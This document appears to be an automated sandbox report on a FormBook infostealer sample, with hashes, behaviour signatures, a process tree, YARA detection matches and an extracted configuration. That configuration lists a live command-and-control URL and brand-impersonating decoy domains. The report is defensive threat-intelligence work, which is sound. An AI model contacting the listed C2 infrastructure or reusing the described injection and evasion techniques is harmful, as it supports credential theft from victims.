Play interactive tour

Edit tour

Windows Analysis Report ff0231.exe

Overview

General Information

Sample Name:	ff0231.exe
Analysis ID:	528603
MD5:	b2bdb06e477be0fc87f7bbd744ff7d38
SHA1:	521e91257dfee2420e66af761f8ef631611a8149
SHA256:	3e1840a0f24371b46b7e196c6c04cba6f218c1989edd4d0eadc540e0b4ef17f7
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Antivirus detection for dropped file

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Self deletion via cmd delete

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

ff0231.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\ff0231.exe" MD5: B2BDB06E477BE0FC87F7BBD744FF7D38)

ff0231.exe (PID: 5348 cmdline: "C:\Users\user\Desktop\ff0231.exe" MD5: B2BDB06E477BE0FC87F7BBD744FF7D38)

explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cmd.exe (PID: 6580 cmdline: /c del "C:\Users\user\Desktop\ff0231.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 6012 cmdline: explorer.exe MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.prometaly.fr/fh3c/"], "decoy": ["victormatoso.com", "stylecolabpreloved.com", "kylur.top", "federal-funds-deposit.com", "metahairstylist.com", "paynow.gmbh", "vivx.us", "awsul.online", "viuhealth.com", "sputnikenglish.com", "metafacebookapp.com", "teslasmartglasses.com", "returns-fedex.com", "dziekanator.com", "pretshellsbakery.com", "vapplebus.com", "kitan.guru", "amazonexpertsindia.com", "teslaislandboys.com", "metasomeone.com", "nasca.us", "rivianhawaii.com", "sportfacebook.site", "twopairsandaspare.com", "poeqwemuschase.com", "favorinfortworth.com", "auco.us", "usnikeshoesbot.top", "onzo.fr", "taokshopper.us", "alexa-score.com", "bass.ooo", "coca-colameta.com", "evchargeoracle.com", "facebook-meta.net", "thatsgoud.com", "comptesgratuit.fr", "arch-hairsalon.com", "heavycutshairstyling.com", "thecrazycornershop.com", "ladiesfirstmc.net", "schuette.tech", "kujira.us", "porscheofac.com", "chasesecurobanking.com", "bell-ca-ref441.ca", "metarbc.com", "meta-facebook.life", "bolt.my.id", "firsttimehomebuyersmanual.com", "loti.net.co", "balea.us", "futureswirl.com", "aolsearch.us", "lafabrique-souvenirs-france.com", "nuerburgring.us", "paypal-payment.cc", "gatieau.biz", "meta-is-facebook.com", "meta-vision.us", "woodwork.sbs", "scottdunn.online", "bestblondehairstylist.com", "rugdlz.fr"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4839:$sqlite3step: 68 34 1C 7B E1 0x494c:$sqlite3step: 68 34 1C 7B E1 0x4868:$sqlite3text: 68 38 2A 90 C5 0x498d:$sqlite3text: 68 38 2A 90 C5 0x487b:$sqlite3blob: 68 53 D8 7F 8C 0x49a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x4839:$sqlite3step: 68 34 1C 7B E1 0x494c:$sqlite3step: 68 34 1C 7B E1 0x4868:$sqlite3text: 68 38 2A 90 C5 0x498d:$sqlite3text: 68 38 2A 90 C5 0x487b:$sqlite3blob: 68 53 D8 7F 8C 0x49a3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ff0231.exe.2920000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.ff0231.exe.2920000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.ff0231.exe.2920000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
3.0.ff0231.exe.400000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.ff0231.exe.400000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.ff0231.exe.400000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
3.0.ff0231.exe.400000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.ff0231.exe.400000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.ff0231.exe.400000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.2.ff0231.exe.2920000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.ff0231.exe.2920000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.ff0231.exe.2920000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
3.0.ff0231.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
